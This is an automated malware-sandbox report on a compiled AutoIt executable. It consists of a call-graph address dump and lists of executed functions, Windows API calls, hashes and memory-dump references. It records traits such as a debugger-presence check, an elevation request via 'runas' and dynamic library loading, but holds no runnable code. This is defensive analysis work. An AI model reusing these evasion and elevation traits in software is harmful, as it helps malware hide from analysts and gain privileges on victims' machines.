67600->67604 67602->67594 67603->67600 67604->67602 67605->67586 67609 443e19 67606->67609 67610 443e26 67609->67610 67611 443e32 WriteFile 67609->67611 67612 443db4 SetFilePointerEx SetFilePointerEx 67610->67612 67611->67578 67612->67611 67613->67142 67614->67059 67615->67096 67616->67171 67617->67096 67618->67096 67619->67078 67620->67105 67621->67069 67622->67073 67623->67079 67624->67141 67625->67141 67626->67141 67627->67093 67628->67112 67629->67098 67630->67129 67631->67149 67632->67149 67633->67142 67634->67153 67635->67168 67636->67161 67637->67166 67638->67173 67639->67173 67640->67112 67641->67064 67642 42d154 67646 480a8d 67642->67646 67644 42d161 67645 480a8d 194 API calls 67644->67645 67645->67644 67647 480ae4 67646->67647 67648 480b26 67646->67648 67649 480aeb 67647->67649 67650 480b15 67647->67650 67651 40bc70 52 API calls 67648->67651 67652 480aee 67649->67652 67653 480b04 67649->67653 67679 4805bf 194 API calls 67650->67679 67666 480b2e 67651->67666 67652->67648 67655 480af3 67652->67655 67678 47fea2 194 API calls __itow_s 67653->67678 67677 47f135 194 API calls 67655->67677 67657 40e0a0 52 API calls 67657->67666 67660 408f40 VariantClear 67662 481156 67660->67662 67661 480aff 67661->67660 67663 408f40 VariantClear 67662->67663 67664 48115e 67663->67664 67664->67644 67665 40e710 53 API calls 67665->67666 67666->67657 67666->67661 67666->67665 67667 401980 53 API calls 67666->67667 67669 40c2c0 52 API calls 67666->67669 67670 480ff5 67666->67670 67671 408e80 VariantClear 67666->67671 67672 40a780 194 API calls 67666->67672 67680 45377f 52 API calls 67666->67680 67681 45e951 53 API calls 67666->67681 67682 40e830 53 API calls 67666->67682 67683 47925f 53 API calls 67666->67683 67684 47fcff 194 API calls 67666->67684 67667->67666 67669->67666 67685 45e737 90 API calls 3 library calls 67670->67685 67671->67666 67672->67666 67677->67661 67678->67661 67679->67661 67680->67666 67681->67666 67682->67666 67683->67666 67684->67666 67685->67661 67686 42b14b 67693 40bc10 67686->67693 67688 42b159 67689 4096a0 331 API calls 67688->67689 67690 42b177 67689->67690 67704 44b92d VariantClear 67690->67704 67692 42bc5b 67694 40bc24 67693->67694 67695 40bc17 67693->67695 67697 40bc2a 67694->67697 67698 40bc3c 67694->67698 67696 408e80 VariantClear 67695->67696 67699 40bc1f 67696->67699 67700 408e80 VariantClear 67697->67700 67701 4115d7 52 API calls 67698->67701 67699->67688 67702 40bc33 67700->67702 67703 40bc43 67701->67703 67702->67688 67703->67688 67704->67692 67705 425b2b 67710 40f000 67705->67710 67709 425b3a 67711 4115d7 52 API calls 67710->67711 67712 40f007 67711->67712 67713 4276ea 67712->67713 67719 40f030 67712->67719 67718 41130a 51 API calls __cinit 67718->67709 67720 40f039 67719->67720 67721 40f01a 67719->67721 67749 41130a 51 API calls __cinit 67720->67749 67723 40e500 67721->67723 67724 40bc70 52 API calls 67723->67724 67725 40e515 GetVersionExW 67724->67725 67726 402160 52 API calls 67725->67726 67727 40e557 67726->67727 67750 40e660 67727->67750 67733 427674 67737 4276c6 GetSystemInfo 67733->67737 67735 40e5e0 67738 4276d5 GetSystemInfo 67735->67738 67764 40efd0 67735->67764 67736 40e5cd GetCurrentProcess 67771 40ef20 LoadLibraryA GetProcAddress 67736->67771 67737->67738 67742 40e629 67768 40ef90 67742->67768 67745 40e641 FreeLibrary 67746 40e644 67745->67746 67747 40e653 FreeLibrary 67746->67747 67748 40e656 67746->67748 67747->67748 67748->67718 67749->67721 67751 40e667 67750->67751 67752 42761d 67751->67752 67753 40c600 52 API calls 67751->67753 67754 40e55c 67753->67754 67755 40e680 67754->67755 67756 40e687 67755->67756 67757 427616 67756->67757 67758 40c600 52 API calls 67756->67758 67759 40e566 67758->67759 67759->67733 67760 40ef60 67759->67760 67761 40e5c8 67760->67761 67762 40ef66 LoadLibraryA 67760->67762 67761->67735 67761->67736 67762->67761 67763 40ef77 GetProcAddress 67762->67763 67763->67761 67765 40e620 67764->67765 67766 40efd6 LoadLibraryA 67764->67766 67765->67737 67765->67742 67766->67765 67767 40efe7 GetProcAddress 67766->67767 67767->67765 67772 40efb0 LoadLibraryA GetProcAddress 67768->67772 67770 40e632 GetNativeSystemInfo 67770->67745 67770->67746 67771->67735 67772->67770 67773 493a178 67787 4937dc8 67773->67787 67775 493a23d 67790 493a068 67775->67790 67793 493b288 GetPEB 67787->67793 67789 4938453 67789->67775 67791 493a071 Sleep 67790->67791 67792 493a07f 67791->67792 67794 493b2b2 67793->67794 67794->67789 67795 425b5e 67800 40c7f0 67795->67800 67799 425b6d 67835 40db10 52 API calls 67800->67835 67802 40c82a 67836 410ab0 6 API calls 67802->67836 67804 40c86d 67805 40bc70 52 API calls 67804->67805 67806 40c877 67805->67806 67807 40bc70 52 API calls 67806->67807 67808 40c881 67807->67808 67809 40bc70 52 API calls 67808->67809 67810 40c88b 67809->67810 67811 40bc70 52 API calls 67810->67811 67812 40c8d1 67811->67812 67813 40bc70 52 API calls 67812->67813 67814 40c991 67813->67814 67837 40d2c0 52 API calls 67814->67837 67816 40c99b 67838 40d0d0 53 API calls 67816->67838 67818 40c9c1 67819 40bc70 52 API calls 67818->67819 67820 40c9cb 67819->67820 67839 40e310 53 API calls 67820->67839 67822 40ca28 67823 408f40 VariantClear 67822->67823 67824 40ca30 67823->67824 67825 408f40 VariantClear 67824->67825 67826 40ca38 GetStdHandle 67825->67826 67827 429630 67826->67827 67828 40ca87 67826->67828 67827->67828 67829 429639 67827->67829 67834 41130a 51 API calls __cinit 67828->67834 67840 4432c0 57 API calls 67829->67840 67831 429641 67841 44b6ab CreateThread 67831->67841 67833 42964f CloseHandle 67833->67828 67834->67799 67835->67802 67836->67804 67837->67816 67838->67818 67839->67822 67840->67831 67841->67833 67842 44b5cb 58 API calls 67841->67842 67843 425b6f 67848 40dc90 67843->67848 67847 425b7e 67849 40bc70 52 API calls 67848->67849 67850 40dd03 67849->67850 67856 40f210 67850->67856 67852 40dd96 67854 40ddb7 67852->67854 67859 40dc00 52 API calls 2 library calls 67852->67859 67855 41130a 51 API calls __cinit 67854->67855 67855->67847 67860 40f250 RegOpenKeyExW 67856->67860 67858 40f230 67858->67852 67859->67852 67861 425e17 67860->67861 67862 40f275 RegQueryValueExW 67860->67862 67861->67858 67863 40f2c3 RegCloseKey 67862->67863 67864 40f298 67862->67864 67863->67858 67865 40f2a9 RegCloseKey 67864->67865 67866 425e1d 67864->67866 67865->67858

                                                                                                                                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0040970C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00409D96
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 004297E5
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2383988440-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                                                                                                                                                                                                                                                                                                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2495805114-3383388033
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1932 40e5b4 1925->1932 1933 427645-42764f 1925->1933 1926->1918 1931 42765d-42766f 1926->1931 1934 4276b0 1927->1934 1935 4276aa-4276ae 1927->1935 1929->1918 1930->1918 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1948 40e5e8 1937->1948 1938->1940 1939->1938 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0SH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3363477735-851180471
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1762048999-758534266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
